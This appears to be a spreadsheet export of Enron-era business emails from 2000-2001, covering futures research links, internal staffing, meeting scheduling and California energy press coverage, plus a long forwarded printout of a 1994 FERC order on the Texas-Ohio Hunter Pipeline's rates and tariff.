    <t>ALL daily chars and matrices as hot links 10/16</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28.pdf_x000D_
Natural Gas     http://www.carrfut.com/research/Energy1/ngas28.pdf_x000D_
Distillate     http://www.carrfut.com/research/Energy1/hoil28.pdf_x000D_
Unleaded     http://www.carrfut.com/research/Energy1/unlded28.pdf_x000D_
_x000D_
Nov WTI/Brent Spread_x000D_
http://www.carrfut.com/research/Energy1/clx-qox.pdf_x000D_
Dec Heat Crack     http://www.carrfut.com/research/Energy1/heatcrack.pdf_x000D_
Dec Gas Crack     http://www.carrfut.com/research/Energy1/gascrack.pdf_x000D_
Dec/May Heat Spread     http://www.carrfut.com/research/Energy1/hoz-hok.pdf_x000D_
Jan/Feb Heat Spread     http://www.carrfut.com/research/Energy1/hof-hog.pdf_x000D_
Nov Gas/Heat Spread     http://www.carrfut.com/research/Energy1/hux-hox.pdf_x000D_
Dec Gas/Heat Spread     http://www.carrfut.com/research/Energy1/huz-hoz.pdf_x000D_
_x000D_
Nat Gas Strip Matrix_x000D_
http://www.carrfut.com/research/Energy1/StripmatrixNG28.pdf_x000D_
Nat Gas Spread Matrix_x000D_
http://www.carrfut.com/research/Energy1/SpreadmatrixNG28.pdf_x000D_
_x000D_
Crude and Products Spread Matrix_x000D_
http://www.carrfut.com/research/Energy1/SpreadmatrixCL28.pdf_x000D_
_x000D_
_x000D_
_x000D_
Scott Oblander_x000D_
312-762-1015_x000D_
312-762-1014 fax_x000D_
Carr Futures_x000D_
150 S. Wacker_x000D_
Suite 1500_x000D_
Chicago, IL 60606</t>
  </si>
  <si>
    <t>Tue, 23 Oct 2001 11:58:01 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jeff.andrews@enron.com'})</t>
  </si>
  <si>
    <t>FW: quantitative research role in EGM fundys</t>
  </si>
  <si>
    <t>Vince,_x000D_
 _x000D_
All's okay with Jeff Shankman re. charging us for one of your managers._x000D_
 _x000D_
Let's move forward on this as soon as possible--I have some momentum building and need to keep pushing our group ahead._x000D_
 _x000D_
When you designate someone from your group for this role I would like to involve him in the hiring of their own support team.  We already have a lead on a good quant. analyst and would like the input of whomever you select for this new role._x000D_
 _x000D_
Thank you very much for your help and support._x000D_
 _x000D_
Jeff_x000D_
 _x000D_
-----Original Message-----_x000D_
From: Shankman, Jeffrey A. _x000D_
Sent: Tuesday, October 23, 2001 1:32 PM_x000D_
To: Andrews, Jeff_x000D_
Subject: RE: quantitative research role in EGM fundys_x000D_
_x000D_
_x000D_
yes_x000D_
_x000D_
-----Original Message-----_x000D_
From: Andrews, Jeff _x000D_
Sent: Tuesday, October 23, 2001 1:28 PM_x000D_
To: Shankman, Jeffrey A._x000D_
Subject: quantitative research role in EGM fundys_x000D_
_x000D_
_x000D_
Jeff,_x000D_
 _x000D_
Per our conversation earlier this month I discussed with Vince Kaminski the possibility of getting a quant. guy on permanent loan to our group to help manage the more complex analyses I want our guys to be doing._x000D_
 _x000D_
Vince is amenable to letting us have one of his managers.  However, because is group is stretched thin and he wants to keep his headcount flat, he would want to hire a replacement and charge the manager we get to us._x000D_
 _x000D_
I would also want to hire an analyst to help this quant. guy with general research ideas and data gathering._x000D_
 _x000D_
Is this acceptable to you?_x000D_
 _x000D_
Jeff</t>
  </si>
  <si>
    <t>Sat, 2 Jun 2001 07:29:38 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">huh ?_x000D_
</t>
  </si>
  <si>
    <t>Mon, 31 Jan 2000 00:22:00 -0800 (PST)</t>
  </si>
  <si>
    <t>January earnings</t>
  </si>
  <si>
    <t xml:space="preserve">Could you please schedule a meeting for Wednesday, Thurs, or Friday with the _x000D_
usual parties?  _x000D_
_x000D_
Thanks,_x000D_
_x000D_
Eric_x000D_
---------------------- Forwarded by Eric Bass/HOU/ECT on 01/31/2000 08:21 AM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
Sean Kiehne@ENRON_x000D_
01/29/2000 11:10 AM_x000D_
To: Eric Bass/HOU/ECT@ECT, Jeffrey C Gossett/HOU/ECT@ECT, David _x000D_
Oliver/HOU/ECT@ECT, William Kelly/HOU/ECT@ECT_x000D_
cc: Jennifer Stevenson/AA/Corp/Enron@Enron, Sharon Roest/AA/Corp/Enron@Enron, _x000D_
Brent A Price/HOU/ECT@ECT, Brenda F Herod/HOU/ECT@ECT, Mark _x000D_
Friedman/HOU/ECT@ECT _x000D_
Subject: January earnings_x000D_
_x000D_
We would like to meet with each of the regional desks to discuss gas January _x000D_
earnings.  Please email or call Sharon Roest to schedule a meeting time.  _x000D_
_x000D_
Please call with any questions._x000D_
_x000D_
Thank You,_x000D_
_x000D_
Sean_x000D_
3 3928_x000D_
</t>
  </si>
  <si>
    <t>Mon, 15 Oct 2001 08:22:47 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'steven.january@enron.com', 'michael.bodnar@enron.com', 'john.buchanan@enron.com', 'steve.kirk@enron.com', 'mary.darveaux@enron.com'})</t>
  </si>
  <si>
    <t>Branchline Curtailment Review</t>
  </si>
  <si>
    <t>_x000D_
	Steve and Mary, here is our first pass at information on the branchline curtailment_x000D_
	for the marketing meeting tomorrow.  _x000D_
_x000D_
	We can use this for our discussion at 1:30.  _x000D_
_x000D_
	Mary, we will call your office at 1:30.  Thanks. Lynn</t>
  </si>
  <si>
    <t>Wed, 23 Aug 2000 06:25:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: FW: Victoria secret gift certificate</t>
  </si>
  <si>
    <t>did i say something wrong?</t>
  </si>
  <si>
    <t>Mon, 29 Jan 2001 02:21:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'teece@haas.berkeley.edu'})</t>
  </si>
  <si>
    <t>Press</t>
  </si>
  <si>
    <t>TO: AD HOC GROUP_x000D_
_x000D_
We received good coverage in the LA Times Friday, as well as CNN Financial_x000D_
(Street Sweep Program).  We received mention in the Chronicle and NY Times_x000D_
Saturday.  No doubt there is more to come, and much I have missed.  Anita_x000D_
Patterson, in my office, is keeping a media file.  Your additions are_x000D_
appreciated._x000D_
_x000D_
We have a chance to make a difference.  There seems to be some momentum_x000D_
building for a rate hike.  Would appreciate your reactions to Gov. Davis'_x000D_
latest proposal._x000D_
_x000D_
Thanks,_x000D_
David_x000D_
_x000D_
_x000D_
======================================_x000D_
David J. Teece, Director_x000D_
Institute of Management, Innovation and Organization_x000D_
F402 Haas School of Business #1930_x000D_
University of California, Berkeley_x000D_
Berkeley, CA  94720-1930_x000D_
Phone:  (510) 642-1075_x000D_
Fax:  (510) 642-2826_x000D_
http://haas.berkeley.edu/~imio_x000D_
======================================</t>
  </si>
  <si>
    <t>Thu, 6 Jul 2000 08:55:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Texas-Ohio FERC Case</t>
  </si>
  <si>
    <t>Here is the other cite._x000D_
_x000D_
----- Forwarded by Gerald Nemec/HOU/ECT on 07/06/2000 03:53 PM -----_x000D_
_x000D_
=09LEXIS(R)/NEXIS(R) Print Delivery &lt;lexis-nexis@prod.lexis-nexis.com&gt;_x000D_
=0907/06/2000 03:30 PM_x000D_
=09=09=20_x000D_
=09=09 To: gerald.nemec@enron.com_x000D_
=09=09 cc:=20_x000D_
=09=09 Subject: LEXIS(R)-NEXIS(R) Email Request (59:0:11094435)_x000D_
_x000D_
_x000D_
                                                                        =20_x000D_
108CKF_x000D_
_x000D_
_x000D_
_x000D_
Print Request:   LEXSEE_x000D_
_x000D_
Time of Request: July 6, 2000  04:30 pm EST_x000D_
_x000D_
Number of Lines: 661_x000D_
Job Number:      59:0:11094435_x000D_
_x000D_
Client ID/Project Name:_x000D_
_x000D_
Research Information:_x000D_
_x000D_
Lexsee 69 FERC P61,145_x000D_
_x000D_
Note:_x000D_
_x000D_
_x000D_
=0F,                                                                       =_x000D_
  =20_x000D_
PAGE 1_x000D_
_x000D_
_x000D_
                             LEXSEE 69 FERC P61,145_x000D_
_x000D_
                           Texas-Ohio Pipeline, Inc._x000D_
_x000D_
             Docket Nos. CP92-217-000, CP92-217-001 and MT94-2-000_x000D_
_x000D_
               FEDERAL ENERGY REGULATORY COMMISSION - Commission_x000D_
_x000D_
                     69 F.E.R.C. P61,145; 1994 FERC LEXIS 2340_x000D_
_x000D_
                Order Issuing Certificates and Denying Rehearing_x000D_
_x000D_
                                November 2, 1994_x000D_
_x000D_
PANEL:_x000D_
 [*1]_x000D_
_x000D_
   Before Commissioners: Elizabeth Anne Moler, Chair; Vicky A. Bailey, Jame=_x000D_
s=20_x000D_
J._x000D_
Hoecker, William L. Massey, and Donald F. Santa, Jr._x000D_
_x000D_
OPINION:_x000D_
_x000D_
   On December 3, 1991, Texas-Ohio Pipeline, Inc. (Texas-Ohio) filed an_x000D_
application pursuant to section 7(c) of the Natural Gas Act (NGA) and Parts=_x000D_
=20_x000D_
157_x000D_
and 284 of the Commission's regulations for certificates of public convenie=_x000D_
nce_x000D_
and necessity to operate its facilities in interstate commerce and to perfo=_x000D_
rm_x000D_
open-access transportation services on existing facilities known as the Hun=_x000D_
ter_x000D_
Pipeline in Garrard County, Kentucky. Texas-Ohio also requested a temporary_x000D_
certificate to operate the Hunter Pipeline on an interim basis pending=20_x000D_
issuance_x000D_
of a permanent certificate._x000D_
_x000D_
   On January 15, 1992, the Commission issued Texas-Ohio a temporary=20_x000D_
certificate_x000D_
authorizing service to existing customers utilizing the Hunter Pipeline; th=_x000D_
e_x000D_
temporary certificate is to expire upon issuance of a final Commission orde=_x000D_
r=20_x000D_
on_x000D_
the request for a permanent blanket certificate. n1 On February 14, 1992,_x000D_
Industrial Energy Services Company (IESCO) sought rehearing of the January =_x000D_
15_x000D_
order._x000D_
_x000D_
   n1 Texas-Ohio Pipeline, Inc., 58 FERC 61,025 (1992)._x000D_
_x000D_
   We will grant Texas-Ohio [*2]  a case-specific certificate pursuant to P=_x000D_
art_x000D_
157, subpart A of the Commission's regulations to operate the Hunter Pipeli=_x000D_
ne=20_x000D_
in_x000D_
interstate commerce and a blanket transportation certificate pursuant to Pa=_x000D_
rt_x000D_
284, subpart G of the Commission's regulations. These authorizations are ma=_x000D_
de_x000D_
subject to compliance with the conditions set forth in this order. For the_x000D_
reasons set forth below, IESCO's request for rehearing is denied._x000D_
_x000D_
Notices and Interventions_x000D_
_x000D_
   Notice of Texas-Ohio's application was published in the Federal Register=_x000D_
 on_x000D_
December 10, 1991 (58 Fed. Reg. 64,507). Algonquin Gas Transmission Company=_x000D_
,=20_x000D_
CNG_x000D_
Transmission Corporation, Elizabethtown Gas Company, Endevco Oil and Gas=20_x000D_
Company_x000D_
(Endevco), Enron Gas Marketing, Inc., Equitrans, Inc., IESCO, O&amp;R Energy, I=_x000D_
nc._x000D_
(O&amp;R Energy), Public Service Electric and Gas Company, and Texas Eastern_x000D_
Transmission Corporation (TETCO) filed timely, unopposed motions to interve=_x000D_
ne._x000D_
=0F,                                                                       =_x000D_
  =20_x000D_
PAGE 2_x000D_
                 69 F.E.R.C. P61,145; 1994 FERC LEXIS 2340, *2_x000D_
_x000D_
n2 Endevco, O&amp;R Energy, and TETCO support Texas-Ohio's application. IESCO_x000D_
protests the application and requests an evidentiary hearing._x000D_
_x000D_
   n2 Timely, unopposed motions to intervene are granted pursuant to Rule 2=_x000D_
14=20_x000D_
of_x000D_
the Commission's Rules of Practice and Procedure, 18 C.F.R. 385.214. [*3]_x000D_
_x000D_
   On December 26, 1991, Texas-Ohio filed an answer to that portion of IESC=_x000D_
O's_x000D_
protest opposing the issuance of a temporary certificate. IESCO responded t=_x000D_
o_x000D_
Texas-Ohio's answer on January 14, 1992. n3_x000D_
_x000D_
_x000D_
   n3 Pursuant to section 385.213(2) of the Commission's regulations, 18=20_x000D_
C.F.R._x000D_
385.213(2), an answer to a protest is not permitted unless the Commission=_x000D_
=20_x000D_
orders_x000D_
otherwise. In order to have as complete a factual record as possible in thi=_x000D_
s_x000D_
proceeding, we will accept the December 26, 1991 and January 14, 1992 filin=_x000D_
gs=20_x000D_
of_x000D_
Texas-Ohio and IESCO, respectively._x000D_
_x000D_
   On February 3, 1992, Energy Marketing Exchange, Inc. filed a petition fo=_x000D_
r_x000D_
leave to intervene out of time. For good cause shown, and since the late_x000D_
intervention will not prejudice any party to this proceeding or otherwise=_x000D_
=20_x000D_
delay_x000D_
the proceeding, we will grant Energy Marketing's motion to intervene out of_x000D_
time._x000D_
_x000D_
Background_x000D_
_x000D_
   The Hunter Pipeline is an interconnection between facilities of Tennesse=_x000D_
e=20_x000D_
Gas_x000D_
Pipeline Company (Tennessee) and TETCO. It consists of two 1,000 horsepower_x000D_
compressors and approximately 600 feet of above-ground 10-inch diameter gas_x000D_
pipeline. The Hunter Pipeline is capable of transporting 60,000 Mcf per day=_x000D_
 of_x000D_
natural gas.  [*4]_x000D_
_x000D_
   Texas-Ohio constructed the Hunter Pipeline pursuant to a certificate iss=_x000D_
ued_x000D_
by the Kentucky Public Service Commission (Kentucky PSC) on November 19, 19=_x000D_
90._x000D_
This authorization designated Texas-Ohio as an intrastate pipeline operatin=_x000D_
g=20_x000D_
as_x000D_
a transporting utility. However, because Texas-Ohio did not hold an=20_x000D_
open-season_x000D_
prior to commencing transportation operations, only Texas-Ohio Gas, Inc. an=_x000D_
d=20_x000D_
its_x000D_
sales customers acquired capacity on the Hunter Pipeline. n4 After=20_x000D_
constructing_x000D_
the facilities, Texas-Ohio filed an application with the Commission in Dock=_x000D_
et_x000D_
No. PR91-5-000 seeking approval of rates under section 311(a)(2) of the=20_x000D_
Natural_x000D_
Gas Policy Act (NGPA). The Commission instituted rate proceedings on April =_x000D_
29,_x000D_
1991 to determine whether Texas-Ohio's rates were fair and equitable. n5_x000D_
_x000D_
   n4 Texas-Ohio is a wholly-owned subsidiary of Texas-Ohio Gas, Inc. (TOG)=_x000D_
, a_x000D_
Houston-based marketer that ships Gulf Coast gas to northeastern industrial_x000D_
end-users via Tennessee and TETCO. Prior to construction of the Hunter=20_x000D_
Pipeline,_x000D_
TOG faced separate bottlenecks on the Tennessee and TETCO systems during th=_x000D_
e_x000D_
winter heating season; the location and capacity of the Hunter Pipeline was_x000D_
selected to avoid these bottlenecks._x000D_
_x000D_
   n5 Texas-Ohio Pipeline, Inc., 55 FERC 61,137 (1991)._x000D_
 [*5]_x000D_
_x000D_
   On June 3, 1991, Texas-Ohio suspended transportation service through the_x000D_
Hunter Pipeline upon discovering that the gas being moved through those_x000D_
facilities was not produced in Kentucky and, therefore, that it was engaged=_x000D_
 in_x000D_
=0F,                                                                       =_x000D_
  =20_x000D_
PAGE 3_x000D_
                 69 F.E.R.C. P61,145; 1994 FERC LEXIS 2340, *5_x000D_
_x000D_
the interstate transportation of natural gas without authorization under NG=_x000D_
A_x000D_
section 7 or NGPA section 311. Subsequently, the Commission instituted an_x000D_
investigation into the construction and operation of the Hunter Pipeline. T=_x000D_
hat_x000D_
investigation determined that from the first day of operation on December 1=_x000D_
,_x000D_
1990 through its voluntary shut-down on June 3, 1991, the Hunter Pipeline_x000D_
transported gas in interstate commerce. n6 On October 19, 1993, the Commiss=_x000D_
ion_x000D_
approved a stipulation and consent agreement in which Texas-Ohio agreed to=_x000D_
=20_x000D_
pay a_x000D_
$ 125,000 civil penalty and to implement a program to comply with the NGA a=_x000D_
nd_x000D_
NGPA. n7_x000D_
_x000D_
   n6 Texas-Ohio received all the gas that flowed through the Hunter Pipeli=_x000D_
ne_x000D_
from Tennessee's interstate facility. Texas-Ohio then redelivered the gas t=_x000D_
o_x000D_
TETCO's interstate facility._x000D_
_x000D_
   n7 Texas-Ohio Pipeline, Inc., 65 FERC 61,069 (1993).Proposal_x000D_
_x000D_
   Texas-Ohio requests authorization to operate its facilities in interstat=_x000D_
e_x000D_
[*6]  commerce and perform open-access transportation service. Texas-Ohio_x000D_
proposes to charge firm shippers a transportation rate consisting of a_x000D_
reservation charge of $ 1.4813 per MMBtu and a commodity charge of $ 0.0103=_x000D_
=20_x000D_
per_x000D_
MMBtu._x000D_
_x000D_
   Interruptible shippers would pay a transportation rate consisting of a_x000D_
commodity charge of $ 0.059 per MMBtu. n8n8 The proposed initial rates are =_x000D_
the_x000D_
same as those which Texas-Ohio was authorized to charge during the=20_x000D_
effectiveness_x000D_
of the temporary certificate. Texas-Ohio Pipeline, Inc., 58 FERC 61,025 at_x000D_
61,059 (1992)._x000D_
_x000D_
_x000D_
   Texas-Ohio states that operation of the Hunter Pipeline will permit=20_x000D_
shippers_x000D_
to avoid bottlenecks on the systems of Tennessee and TETCO. TETCO's bottlen=_x000D_
eck_x000D_
is located at a point near the Kentucky-Tennessee border. Due to this_x000D_
constraint, TETCO has historically curtailed the interruptible transportati=_x000D_
on=20_x000D_
of_x000D_
natural gas from receipt points located south of the Kentucky- Tennessee=20_x000D_
border_x000D_
that is destined for delivery to points north during the winter heating=20_x000D_
season._x000D_
During the past three winter seasons, TETCO has curtailed interruptible_x000D_
transportation for gas originating upstream of its Mt. Pleasant compressor_x000D_
station [*7]  in Tennessee that is scheduled for delivery downstream to Zon=_x000D_
es=20_x000D_
C_x000D_
and D._x000D_
_x000D_
   The bottleneck on Tennessee's system occurs in Mercer County, Pennsylvan=_x000D_
ia._x000D_
As a result, gas produced and transported from receipt points south of Merc=_x000D_
er_x000D_
County cannot be transported to points north of Mercer County during certai=_x000D_
n_x000D_
periods of the year. During the past four winter seasons, Tennessee has_x000D_
curtailed gas moving on an interruptible basis from points upstream of=20_x000D_
stations_x000D_
219, 237, and 313 to locations downstream of those stations._x000D_
_x000D_
   Texas-Ohio's facilities are positioned to avoid both bottlenecks. In thi=_x000D_
s_x000D_
regard, Tennessee typically has interruptible transportation capacity for_x000D_
deliveries to Texas- Ohio's facilities, but has bottlenecks downstream of i=_x000D_
ts_x000D_
interconnection with Texas-Ohio. Conversely, TETCO has a bottleneck upstrea=_x000D_
m=20_x000D_
of_x000D_
Texas-Ohio's facilities, but has capacity for the movement of interruptible_x000D_
transportation volumes downstream of its Mt. Pleasant compressor station. A=_x000D_
s_x000D_
such, Texas-Ohio's facilities can be utilized to alleviate bottlenecks on t=_x000D_
wo_x000D_
different pipeline systems and thereby move gas to markets in the Northeast=_x000D_
._x000D_
=0F,                                                                       =_x000D_
  =20_x000D_
PAGE 4_x000D_
                 69 F.E.R.C. P61,145; 1994 FERC LEXIS 2340, *7_x000D_
_x000D_
_x000D_
Discussion_x000D_
_x000D_
   The Commission finds that by utilizing the Hunter [*8]  Pipeline shipper=_x000D_
s_x000D_
located upstream of the TETCO bottleneck can utilize Tennessee's system to=_x000D_
=20_x000D_
move_x000D_
gas to Texas-Ohio for redelivery to TETCO and continued transportation_x000D_
downstream. Shippers upstream of Tennessee's bottleneck, but downstream of_x000D_
Texas-Ohio's facilities, can, by displacement, utilize Texas-Ohio's system =_x000D_
to_x000D_
access the TETCO system for continued transportation downstream. This_x000D_
arrangement will avoid both the upstream and downstream bottlenecks and all=_x000D_
ow_x000D_
continued delivery of gas to various northeast markets located off both the_x000D_
TETCO and Tennessee systems. We find that the public convenience and necess=_x000D_
ity_x000D_
requires issuance of a certificate pursuant to Part 157, subpart A,=20_x000D_
authorizing_x000D_
operation of Texas-Ohio's Hunter Pipeline._x000D_
_x000D_
   The Commission also finds that Texas-Ohio's pro forma tariff generally_x000D_
complies with the requirements for a Part 284 blanket transportation_x000D_
certificate. Accordingly, we will grant Texas- Ohio's application for a Par=_x000D_
t=20_x000D_
284_x000D_
blanket transportation certificate, subject to the conditions set forth her=_x000D_
ein_x000D_
to ensure Texas-Ohio's full compliance with the conditions of Order Nos. 63=_x000D_
6,_x000D_
497, and 566. Texas-Ohio's Part 284 blanket certificate will become effecti=_x000D_
ve_x000D_
[*9]  upon Texas-Ohio's full compliance with these conditions._x000D_
_x000D_
_x000D_
I. Rates_x000D_
_x000D_
   Texas-Ohio proposes to charge the initial rates that were approved in th=_x000D_
e_x000D_
temporary certificate. Under this proposal, firm shippers would pay a_x000D_
transportation rate consisting of a reservation charge of $ 1.4813 per MMBt=_x000D_
u=20_x000D_
and_x000D_
a commodity charge of $ 0.0103 per MMBtu. Interruptible shippers would pay =_x000D_
a_x000D_
transportation rate consisting of a commodity charge of $ 0.059 per MMBtu. =_x000D_
The_x000D_
proposed rates are based on the modified fixed variable rate design (MFV), =_x000D_
100_x000D_
percent equity capitalization, a 15 percent return on equity, and a 10 perc=_x000D_
ent_x000D_
depreciation. The reservation and usage charges are based on 100 percent of=_x000D_
=20_x000D_
the_x000D_
system design capacity._x000D_
_x000D_
A. Rate Design_x000D_
_x000D_
   Order No. 636 requires pipelines to use the straight fixed variable (SFV=_x000D_
)_x000D_
rate design methodology. n9 Texas-Ohio has not provided any evidence which=_x000D_
=20_x000D_
would_x000D_
support an exception to this requirement. Accordingly, we find that Texas-O=_x000D_
hio_x000D_
should be required to use the SFV rate design methodology. Additionally, si=_x000D_
nce_x000D_
Texas-Ohio's cost of service does not include any variable costs, we will_x000D_
require it to use $ 0.0000 as the minimum FTS usage and ITS rates. n10_x000D_
_x000D_
   n9 See 18 C.F.R. 284.7(d)._x000D_
_x000D_
   n10 See Gateway Pipeline Co., 55 FERC 61,488 (1991). [*10]  B.=20_x000D_
Capitalization_x000D_
and Rate of Return_x000D_
_x000D_
   Texas-Ohio proposes a capitalization consisting of 100 percent equity. W=_x000D_
e_x000D_
find that it is appropriate to use a hypothetical capital structure consist=_x000D_
ing_x000D_
of 57 percent debt and 43 percent equity; this structure is based on the 43=_x000D_
.18_x000D_
percent average equity ratio held by a group of seven major investor- owned_x000D_
interstate pipelines at the end of 1993._x000D_
=0F,                                                                       =_x000D_
  =20_x000D_
PAGE 5_x000D_
                 69 F.E.R.C. P61,145; 1994 FERC LEXIS 2340, *10_x000D_
_x000D_
_x000D_
   We have generally used recent rates for Baa-rated public utility bonds t=_x000D_
o=20_x000D_
set_x000D_
the debt costs on similar projects since Baa is the prevailing rating for_x000D_
pipeline bonds. The rate for Baa utility bonds averaged 8.40 percent for th=_x000D_
e=20_x000D_
six_x000D_
months ending July 31, 1994, with a one month average of 8.80 percent for J=_x000D_
uly_x000D_
1994. We find it appropriate to utilize a cost of debt of 8.50 percent._x000D_
_x000D_
   Texas-Ohio's proposed 15 percent rate of return on equity is excessive_x000D_
considering the prevailing cost of capital. We find acceptable a rate of=20_x000D_
return_x000D_
derived from a range of returns based upon an analysis of recent interest=_x000D_
=20_x000D_
rates_x000D_
and a discounted cash flow (DCF) study. The lower end of the range is=20_x000D_
determined_x000D_
by the prevailing Baa rating for public utility bonds; as discussed above, =_x000D_
we_x000D_
will use a figure of 8.50 percent for [*11]  the most recent six months. Si=_x000D_
nce_x000D_
equity is riskier than debt, 100 basis points should be added to the bond=_x000D_
=20_x000D_
rate,_x000D_
thus bringing the lower end of the range to 9.50 percent._x000D_
_x000D_
   The upper end of the range is determined by a DCF analysis of a proxy gr=_x000D_
oup_x000D_
of seven publicly held natural gas transmission companies. n11 This proxy=_x000D_
=20_x000D_
group_x000D_
is used because the DCF methodology requires market price data as an input =_x000D_
in_x000D_
the estimation of investor-expected equity returns. The DCF analysis for th=_x000D_
e_x000D_
proxy group results in a range of equity returns of 10.77 percent to 13.41_x000D_
percent, with a median return of 12.19 percent._x000D_
_x000D_
   n11 Coastal Corporation, El Paso Natural Gas Company, Enron Corporation,_x000D_
Panhandle Eastern, Sonat Inc., Transco Energy, and Williams Companies, Inc._x000D_
_x000D_
   This analysis uses dividend yields and forecasts of long- term growth ra=_x000D_
tes_x000D_
as follows. For the first five years, the Institutional Brokerage Estimate_x000D_
System (IBES) estimates of five year growth in earnings per share was used.=_x000D_
=20_x000D_
For_x000D_
longer-term growth (for the years 2000-2010), estimates taken from DRI/McGr=_x000D_
aw_x000D_
Hill (Energy Review, Spring-Summer 1994) for growth in the natural gas=20_x000D_
industry_x000D_
were used. A growth rate for each company in the [*12]  proxy group was_x000D_
determined by averaging the two growth rates. Combining the bottom and top_x000D_
figures establishes a range of 9.50 percent to 13.41 percent. The midpoint =_x000D_
of_x000D_
this range is approximately 11.50 percent._x000D_
_x000D_
   The Hunter Pipeline went into initial operation in 1990 and faces no_x000D_
construction risk. Accordingly, we find that the company's risk is no highe=_x000D_
r_x000D_
than that of the average pipeline. Therefore, we will require a rate of ret=_x000D_
urn_x000D_
on equity of 11.5 percent, which is equal to the midpoint of the range of_x000D_
reasonableness._x000D_
_x000D_
C. Depreciation_x000D_
_x000D_
   Texas-Ohio proposes a book depreciation rate of 10 percent calculated on=_x000D_
=20_x000D_
the_x000D_
straight-line method which supports an economic life of 10 years. We believ=_x000D_
e_x000D_
that the economic life of the Hunter Pipeline will depend upon gas reserves_x000D_
connected to the Tennessee system and the future demand for natural gas_x000D_
downstream of those facilities. We are confident that market demand and_x000D_
operation of Tennessee and TETCO to service downstream markets in the=20_x000D_
Northeast_x000D_
States will continue for the next 25 years. We also believe that the Hunter_x000D_
Pipeline will operate on a permanent basis and play an important role in th=_x000D_
e_x000D_
delivery of gas, especially during high demand [*13]  periods. Based on the=_x000D_
se_x000D_
factors, we find that an economic life of 25 years should be used to=20_x000D_
calculate a_x000D_
depreciation rate of four percent for the Hunter Pipeline facilities._x000D_
=0F,                                                                       =_x000D_
  =20_x000D_
PAGE 6_x000D_
                 69 F.E.R.C. P61,145; 1994 FERC LEXIS 2340, *13_x000D_
_x000D_
_x000D_
D. Conclusion_x000D_
_x000D_
   We will require Texas-Ohio to modify its rates as follows. For=20_x000D_
interruptible_x000D_
service, the minimum rate shall be $ 0.0000; the maximum rate shall be $=20_x000D_
0.0518._x000D_
For firm service, the minimum reservation charge shall be $ 0.0000; the=20_x000D_
maximum_x000D_
reservation charge shall be $ 1.5749. The usage charge for firm service sha=_x000D_
ll=20_x000D_
be_x000D_
$ 0.0000. n12 The rates approved herein are initial rates under NGA section=_x000D_
 7;_x000D_
their approval does not constitute approval of any underlying rate=20_x000D_
methodology,_x000D_
principle, or concept to be used in any general rate change filed pursuant =_x000D_
to_x000D_
NGA section 4. These initial rates will remain in effect until such time as_x000D_
Texas-Ohio files an NGA section 4 general rate proceeding. At that time, an=_x000D_
y_x000D_
party or the Commission staff may propose new rates based on different_x000D_
methodologies, principles or concepts._x000D_
_x000D_
   n12 All rates are expressed per MMBtu._x000D_
_x000D_
   II. Pro Forma Tariff_x000D_
_x000D_
Texas-Ohio has applied for a blanket transportation certificate under secti=_x000D_
on_x000D_
284.221 of the Commission's regulations. It  [*14]  proposes to provide bot=_x000D_
h_x000D_
firm and interruptible transportation service. To commence service under a_x000D_
blanket certificate, Texas-Ohio must file and place into effect rates, term=_x000D_
s,_x000D_
and conditions that are consistent with Part 284 of the regulations.=20_x000D_
Texas-Ohio_x000D_
has not made a tariff filing in this proceeding; it has, however, filed pro_x000D_
forma tariff sheets which indicate the form its tariff will take. Generally=_x000D_
,=20_x000D_
the_x000D_
pro forma tariff conforms to the Commission's requirements. As discussed=20_x000D_
below,_x000D_
however, certain provisions are either inconsistent with the Commission's_x000D_
policies or are not adequately justified. Certain specific changes that we=_x000D_
=20_x000D_
will_x000D_
require to be made to Texas-Ohio's pro forma tariff are set forth in an=20_x000D_
appendix_x000D_
to this order._x000D_
_x000D_
A. Order No. 636_x000D_
_x000D_
   Review of Texas-Ohio's pro forma tariff indicates a number of changes th=_x000D_
at_x000D_
must be implemented to satisfy the requirements of Order No. 636. To implem=_x000D_
ent_x000D_
those changes, Texas-Ohio must make a tariff filing within 45 days of the d=_x000D_
ate_x000D_
of the issuance of this order. Also, Texas-Ohio is reminded that while cert=_x000D_
ain_x000D_
provisions of Order No. 636 may not apply at this time, future changes in i=_x000D_
ts_x000D_
operations may require tariff revisions to satisfy [*15]  the requirements =_x000D_
of_x000D_
that Order._x000D_
_x000D_
1. Equality of Service/Open Season_x000D_
_x000D_
   Pipelines that offer open-access transportation service must provide tho=_x000D_
se_x000D_
services on a basis that is equal in quality for all gas suppliers, whether=_x000D_
=20_x000D_
the_x000D_
gas is purchased from the pipeline or from another seller. Section=20_x000D_
284.14(b)(iv)_x000D_
of the Commission's regulations, 18 C.F.R. 284.14(b)(iv), requires a=20_x000D_
pipeline's_x000D_
tariff to reflect the principle of equality of service for all gas transpor=_x000D_
ted_x000D_
under each rate schedule._x000D_
_x000D_
   Texas-Ohio performs only unbundled transportation service; it does not_x000D_
provide pipeline sales service. Texas-Ohio does, however, provide=20_x000D_
transportation_x000D_
service for its affiliated marketers, TOG and Texas-Ohio West, Inc. Origina=_x000D_
l_x000D_
Sheet No. 6, section 3.2, of Texas-Ohio's pro forma tariff provides that_x000D_
=0F,                                                                       =_x000D_
  =20_x000D_
PAGE 7_x000D_
                 69 F.E.R.C. P61,145; 1994 FERC LEXIS 2340, *15_x000D_
_x000D_
customers with an already executed firm transportation contract for service=_x000D_
 on_x000D_
the Hunter Pipeline as of the effective date of the tariff shall have a=20_x000D_
priority_x000D_
over customers executing a service agreement at a later date. Service is_x000D_
otherwise offered on a first-come, first-served basis. We find that this_x000D_
provision gives preferential treatment to selected customers. It is unduly_x000D_
discriminatory and must be [*16]  removed from the tariff. Further, we find=_x000D_
=20_x000D_
that_x000D_
Texas-Ohio has never held an open-season or otherwise provided for the_x000D_
non-discriminatory allocation of system capacity prior to initiating servic=_x000D_
e._x000D_
Accordingly, we hold that Texas-Ohio must implement an open season within 3=_x000D_
0_x000D_
days of the date of issuance of an order in this proceeding to ensure non-_x000D_
discriminatory allocation of system capacity._x000D_
_x000D_
2. Pregranted Abandonment and Right of First Refusal_x000D_
_x000D_
   Section 284.221(d) of the Commission's regulations, 18 C.F.R. 284.221(d)=_x000D_
,_x000D_
authorizes pregranted abandonment of interruptible and short-term firm_x000D_
transportation at the end of the contract. A short-term contract is one wit=_x000D_
h a_x000D_
term of less than one year. For long-term transportation with a term of mor=_x000D_
e_x000D_
